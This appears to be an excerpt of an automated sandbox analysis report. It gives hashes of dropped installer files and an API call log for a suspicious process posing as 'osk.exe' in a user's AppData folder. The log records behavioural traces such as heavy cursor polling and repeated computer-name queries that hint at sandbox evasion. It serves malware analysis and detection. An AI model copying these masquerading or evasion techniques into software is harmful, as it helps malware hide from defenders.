SHA1: a13719e746605e286b327a92869d59a55e56dae7 SHA256: 0cb05a2498f4dfa2c5247259ace7f3c712fedd65a77991bf9cbe99e87eb44319 SSDeep: 96:UK5Smq64nywCyqvmScfQEz04jMpDLiIzhZLlZhDLT:Tj4qpEo4jOTH |
|
|
| C:\588bce7c90097ed212\1055\LocalizedData.xml | 75.02 KB |
MD5:
ae07c3632c549c254b6d54a80ef8423e
SHA1: 11e31edceaa980be065f1071cb3033e575a3b929 SHA256: acaee07e1c0ed1d79b91a584c42c6e5def3e746eb22e8cde41ed64b3b604b359 SSDeep: 1536:bM8DL5YHRL87mlQg5IgrbGZzwOS8Frc+iI0jJNJ7rtRpU8:bM8DL5YHRL87mlQg5IgrbGZzwOS8Frcp |
|
|
| C:\588bce7c90097ed212\1055\LocalizedData.xml | 75.23 KB |
MD5:
9784e3debf535f3b36e15650c9a24996
SHA1: 92dd3e06579c280be398e1f5b24024b22f0b0cb3 SHA256: 9cd087aa6a66916efde5cf7af89f8191dcad7137f7ab6e20a89c203fdda870bb SSDeep: 1536:qM8DL5YHRL87mlQg5IgrbGbzwOS8Frc+iI0jJNJ7rtRpUQ:qM8DL5YHRL87mlQg5IgrbGbzwOS8Frcb |
|
|
| C:\588bce7c90097ed212\2052\eula.rtf | 5.89 KB |
MD5:
df6a878a57512a23d8cf3b758d521815
SHA1: d17bd1e910a96dbac514c50dd855f0baa649e1af SHA256: 79a771161b8d657287295354a0ed1d209f346775bf5b6dcf6334f7d03008e2cb SSDeep: 96:1tXsc2heDjxrDT2k9rkKp7aDKaXzaWZMa/O9wzy6n/MpDTKTGptcgzZCQZwJmbBX:192KQkRGDtXeWZv/O9XmOdZzQJWBBdVp |
|
|
| C:\588bce7c90097ed212\2052\LocalizedData.xml | 59.26 KB |
MD5:
80ad089b53d59e11dec40275573033eb
SHA1: af0a2251f52ecceebddfe6727974be25961b4601 SHA256: a6cbed16243cb7fc651db62bd18aa8e72b8bc50d7bd86a3f1a3294def701b85f SSDeep: 384:4w7yHdhTgqbbT1HjWZez2jtKgst+7x0x8EM5NnqQivGXU4woZukC7FQKAuXR/4ma:dyjg2z2bXXwoZukC7FQKAuXRgcJy |
|
|
| C:\588bce7c90097ed212\2052\LocalizedData.xml | 59.47 KB |
MD5:
b8436974305e9110559672733b326175
SHA1: 72b67249dface16020639d9b53d777a5e1ffe211 SHA256: dfc35459991e0909addd32e3f1490cd0d08291a50a6c3c05e619af4d1e02517f SSDeep: 384:XiIZjyHdhTgqbbT1HjWZez2jtKgst+7x0x8EM5NnqQivGXU4woZukC7FQKAuXR/I:Xdjyjg2z2bXXwoZukC7FQKAuXRgcJIv |
|
|
| C:\588bce7c90097ed212\2070\eula.rtf | 4.12 KB |
MD5:
f3326387f1d8c4c0ba129687acf01a17
SHA1: f613de3c527c3da3cb5041a5f288fd8aa5afe238 SHA256: 86336f2f1a26f0bb717c9fc71594a24b35806af648be6c51846d4fa1d7f06e69 SSDeep: 96:wW1mDj6rfkrIwx0LlHKe1rvGA9mE0Eyh+iH/OMpiKwIurpEpiT0T8x8rpEpiTfHK:joj6rcrIwclqe1ruAYEBm+imOvurerVq |
|
|
| C:\588bce7c90097ed212\2070\LocalizedData.xml | 78.37 KB |
MD5:
cc51177823e64646a21a69218f0e152d
SHA1: a306407bf221f06cb7f5784ceb6851325bd51423 SHA256: 8f2acd0174d59f1be54b12d1e30d6303b51e8d9e40d42d7b6bc43d9960f57bb9 SSDeep: 384:4wdLPpRgMjLeUueUA48DYeUOqeUd/iboeuXWpFPYOAjw/BdgysR0AmhRod30J0qy:fenekeCeRuXWpFxgJMh230JMaW7 |
|
|
| C:\588bce7c90097ed212\2070\LocalizedData.xml | 78.59 KB |
MD5:
b7196609b9b775294e19704b3c338990
SHA1: e15ddaac169d068d658cbb652bba491f977ce69f SHA256: d9d627ad05e6776e4c01787ec7e1d8944c17ba4e0067329f462dfb4d8b411e9c SSDeep: 384:MutBPpRgMjLeUueUA48DYeUOqeUd/iboeuXWpFPYOAjw/BdB4jsR0AmhRod30J0o:N1enekeCeRuXWpFxeoMh230JMaW0 |
|
|
| C:\588bce7c90097ed212\3076\eula.rtf | 6.36 KB |
MD5:
d203b4d9d448e1979cf6e8b09b23ba0b
SHA1: 27a3df2c4cf0b09ce688a6bed629adf0094b3115 SHA256: 08afef8b81a1da71c9e3051cce3f46cb281ada3c5d8e35cc78f628eaa504023e SSDeep: 96:5u8Rx+f+/DdczZD41raZM4HbegdxqKZJQ1/FSMZJujgzc/MpD1JzIfcHvR2k0cv2:cnf+LdS2NBZMjOfro2n6CA5 |
|
|
| C:\588bce7c90097ed212\1028\LocalizedData.xml | 59.39 KB |
MD5:
0eb3da5a02f6775ee902c628b0c550f9
SHA1: 17c7c99dfa0ae6861f9b7fa1a982b3a367505ab2 SHA256: 4786ed43f93a25096b14683710a858bfe9f2ec63fbfb70437a4aeb99a38289a5 SSDeep: 384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiC:tbCWYFrewYTJCy |
|
|
| C:\588bce7c90097ed212\3076\LocalizedData.xml | 59.60 KB |
MD5:
8253818a5de32a1468b516ca3b8f0279
SHA1: e17c99455f0d4ae50bd502a70e85cbf744453879 SHA256: 7912d8125be030921bade72d89a30d2ec130310847322a2442da40788e0070cd SSDeep: 384:/bwYGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiN:/MbCWYFrewYTJC9 |
|
|
| C:\588bce7c90097ed212\3082\eula.rtf | 3.00 KB |
MD5:
35cf5b780d0d9dfd8eb2486a4201c411
SHA1: 059507877a8f25c00232a25a76c847cb94e76f3c SHA256: 50908be0d39a1fb4d9e2dcd623120c04ea71826f8e7cc8c11506cde0cc1044b3 SSDeep: 48:MTN3nfZQZXRFOTfyTZQDeK9xxMFcJ55HsUXHNX/RgMzsrMpDgLmqIy3W0b8EwKgq:MTBfZQZhoTfyTZQDeQxpDHsOH1ZvoMp4 |
|
|
| C:\588bce7c90097ed212\3082\eula.rtf | 3.19 KB |
MD5:
70902244d20f44a7012755957885cf90
SHA1: f20139b9d80b99b0a590b800d5cecdec0ef296de SHA256: 1da338383e22ededb0b1a9e9e7855af7372e8b5e906dcae184c50ec27b5fe106 SSDeep: 96:dfOF2bPaM4MUnbiFSDHsOH1ZvoMpDYmILwJUyBUMPe/:pNPLU2Fb21iOPINy+h |
|
|
| C:\588bce7c90097ed212\3082\LocalizedData.xml | 78.12 KB |
MD5:
992f740170e4f3dbdf4e2003675b2fce
SHA1: 0df2c3378732e9c57fc7d4354746b808a78cb91a SHA256: 4fb1cdd2ead3cd3959d41c90094f66f0c3f00ee8592101cddd1f1176706cb29d SSDeep: 1536:Xo/yYrDKRqvf+ffl0VMf/mfL94T+7j2JoiZh:Xo/yYrDKRqvf+feVMf/mfL94T+7j2Jrh |
|
|
| C:\588bce7c90097ed212\3082\LocalizedData.xml | 78.33 KB |
MD5:
a612a6a6f789ff382bb0103cfeb5bfc4
SHA1: f0f4c3687bb70f782568aa362aa2e7e252bd6f09 SHA256: 4a3852ac742bec845da8e7095462020dd42fe7e9b95a47254f84b786bc168864 SSDeep: 1536:Vm/yYrDKRqvf+ffl0VMf/mfL94v+7j2JoiZV:Vm/yYrDKRqvf+feVMf/mfL94v+7j2JrV |
|
|
| C:\588bce7c90097ed212\Client\Parameterinfo.xml | 197.07 KB |
MD5:
e78c550c69a1da5d8791abdabbf19bf8
SHA1: ee2118bdb7ae85f097bd99f878a2ac02f447609c SHA256: 8f220eee19ac590eeaeeb28bf5728115056cc20414fab51f146c3cdd6163ba00 SSDeep: 384:wYQH0RbAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKMNGIe9b7:w2RbYoVQTLTQTDFdPknZ13GpPcbrIA |
|
|
| C:\588bce7c90097ed212\Client\UiInfo.xml | 38.13 KB |
MD5:
77fed17e524a4644b0109007dfafd2ad
SHA1: 362f0a885023910d953ddb6b2f0bc6a269840f24 SHA256: 2bf06783a3b625834da562a7d3483ca6156b13be7648a3c7cc79bd5a2c1d0089 SSDeep: 768:24URyd5vssgP7ZgZ/vSguJQvFQXvDINJh6F8hZkV1GO0N0phUl9eu+dODOOODOtB:24URyd5vsTPuZXQYQLIN/6F8hZkV1GOC |
|
|
| C:\588bce7c90097ed212\Extended\Parameterinfo.xml | 91.13 KB |
MD5:
0efed6afdbc1026ee9b0f44638d93512
SHA1: a1c508475ea63a4cfc6a9952cd2ecfb0b5c6e10e SHA256: a1e6ec40832623603e3a014e915af701dd49925a6a4a34256bf9215da2d167cb SSDeep: 384:tYDmmqzP4JUaGMLiqedW0XeeUnG3GPcbrKFA:tRTaBG2PcbrIA |
|
|
| C:\588bce7c90097ed212\Extended\UiInfo.xml | 38.14 KB |
MD5:
7ed283ef7f13935d97594d99e3c9d315
SHA1: fdf7515937d17c8f3ece54e8169ca0a5c7ab3587 SHA256: e35546df04a3ce028c93913185e6b0b69a231e3ab44bb3da0ebd2f73e23ef49e SSDeep: 768:24URsd5vssgP7ZgZ/vSguJQvFQXvDINJh6Fuh3kr1UO0NWpPUb9cu+dOtOcOdOjP:24URsd5vsTPuZXQYQLIN/6Fuh3kr1UOs |
|
|
| C:\588bce7c90097ed212\Graphics\Print.ico | 1.12 KB |
MD5:
3c55ad61fc2fc6dca01a6f7ea79ce489
SHA1: 73042adc27bc7342020cff09122c19acf7e4baa7 SHA256: 01faca45a590b1e8d0fb658e9b6ce8284ac3d09627cee55ee8fa1f8f6646b72d SSDeep: 24:dOjNyw2aSGZHJi4U7Wf0mDX+QF7s/AemFAM:MjNyw/0NW9DOp/ANZ |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate1.ico | 0.87 KB |
MD5:
4c0f48d068d8754c22b8b6799ff3ba9c
SHA1: 173ecb31f7b2c236131e92584923735fa2553e3f SHA256: 0809aa7e6538500e40c9cbd64eb9a8f6782f3ae2e2814d9e071534a5bb136f7b SSDeep: 6:kRKqNllGuv/ll2dL/rK//dlQt0tlWMlMN8Fq/wbD4tNZDlNc367YCm6p+WvtjlpO:pIGOmDAQt8n+uNbctNZ5w6AsXjKHRp5r |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate2.ico | 0.87 KB |
MD5:
78c18e7a58cb1a1692870c3c132a71e0
SHA1: cc5d1ea855fb5c45e2b61f9800f172ebc6d222ff SHA256: e21343272a69b4ed9d50bba5121fc441b549e6cd36ac8a628f78accc23b0f45d SSDeep: 12:pmZX5+9wQaxWbwW3h/7eHzemn0iLHRp5r:Md5EaxWbh/CntX |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate3.ico | 0.87 KB |
MD5:
9c0664913632a50325be18586a8a4bcc
SHA1: 9971f9cc8af834ad433ff95929db841d13cc61a0 SHA256: af71e083aaceb644dcc57e4e72246d549253fd7ec50e9e81f94b3a078bc5b4f5 SSDeep: 12:pPrMIMxPWk3AyORrabBQ+gra2/MXWM4xfQHRp5r:1gxPbXlBQ+gr1ffOX |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate4.ico | 0.87 KB |
MD5:
105e5a07e1cdf31256fe6b3271c26fb3
SHA1: 5d0593f744de6e0a1d0a8d58b45a0848636a1c64 SHA256: 689b06d881652311c2f2addf168c3f8bee9afe91a74f22357623f595ef6560d3 SSDeep: 6:kRK///FleTxml+SzNaoT9Q0/lHOmMdrYln8OUo/XRWl2XOXFBYpqnHp/p5r:p///FPwxUrMunUofRReFNHRp5r |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate5.ico | 0.87 KB |
MD5:
1983ebef1d561ce4adc05ad9f1577f05
SHA1: d47417207020bf7dec0847f316e38876d55a4697 SHA256: 443c81f478bf7a5000751e744ea2e809a4383df0ef91a1d56d93b17846c18157 SSDeep: 6:kRKi+Blqkl/QThulVDYa5a//ItEl/aotzauakg//5aM1lkl05Kaag2/JqnHp/p5r:pXBHehqSayIylrtBg/bk4AgzHRp5r |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate6.ico | 0.87 KB |
MD5:
9ef318f86fe4bbe27a4cc84a5fd8234a
SHA1: 215520143492487a0d84390668319b5f2557794d SHA256: 8abdfab4a7a90eb1f48619ad4cd477c87049c279e065a1c713faf6015ddb243e SSDeep: 12:pjs+/hlRwx5REHevtOkslTaGWOpRFkpRHkCHRp5r:tZ/u+HeilBh/F+RdX |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate7.ico | 0.87 KB |
MD5:
f968996c0cdde40381dcdbf6c7dc730b
SHA1: f193f2e12ceb978c9a9258d578cbef54ec16ce21 SHA256: 579bf3ae80cbcd918cf26849cb67dd826fd74ba8ff347ef54698cc3e368fea45 SSDeep: 6:kRKIekllisUriJ2IP+eX8iDml8mS8+hlxllwqlllkg2klHYdpqnHp/p5r:p8os0iieX8iNVHX//x2sHYdoHRp5r |
|
|
Threads
Thread 0xdf4
3820
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, address_out = 0x74f97060 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsAlloc, address_out = 0x74f9bea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsSetValue, address_out = 0x74f92550 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = InitializeCriticalSectionEx, address_out = 0x74f97060 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsAlloc, address_out = 0x74f9bea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsGetValue, address_out = 0x74f870c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsSetValue, address_out = 0x74f92550 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Module | Load | module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LCMapStringEx, address_out = 0x74f7ed00 |
|
1 | |
| Module | Get Filename | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 261 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x75ea4280 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitOnceExecuteOnce, address_out = 0x74f95550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x75efeb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleEx, address_out = 0x75ea43d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandle, address_out = 0x75eff110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimePreciseAsFileTime, address_out = 0x75eff1e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77c13a00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeConditionVariable, address_out = 0x77c88c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x77c18a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x7500fca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSRWLock, address_out = 0x77c13a00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x77bf58e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TryAcquireSRWLockExclusive, address_out = 0x77c72ce0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x77bf83a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x7500fcf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWork, address_out = 0x75ea6db0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SubmitThreadpoolWork, address_out = 0x77bfeb00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWork, address_out = 0x77bfed50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-string-l1-1-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = CompareStringEx, address_out = 0x74f62c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = EnumSystemLocalesEx, address_out = 0x74f63a60 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-datetime-l1-1-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetDateFormatEx, address_out = 0x74fd9b40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetLocaleInfoEx, address_out = 0x74f8f170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetTimeFormatEx, address_out = 0x74fd9e10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetUserDefaultLocaleName, address_out = 0x74f94220 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = IsValidLocaleName, address_out = 0x74f8ed60 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-localization-obsolete-l1-2-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LCIDToLocaleName, address_out = 0x74f8da50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LocaleNameToLCID, address_out = 0x74f6bac0 |
|
1 | |
| COM | Create | interface = A95664D2-9614-4F35-A746-DE8DB63617E6, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| System | Get Cursor | x_out = 424, y_out = 408 |
|
626 | |
| System | Get Cursor | x_out = 849, y_out = 234 |
|
1 | |
| System | Get Time | type = Local Time, time = 2019-04-12 11:17:56 (Local Time) |
|
1 | |
| System | Get Cursor | x_out = 849, y_out = 234 |
|
2 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsGetValue, address_out = 0x74f870c0 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
67 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77bb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memcpy, address_out = 0x77c27b00 |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\appdata\roaming\osk.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
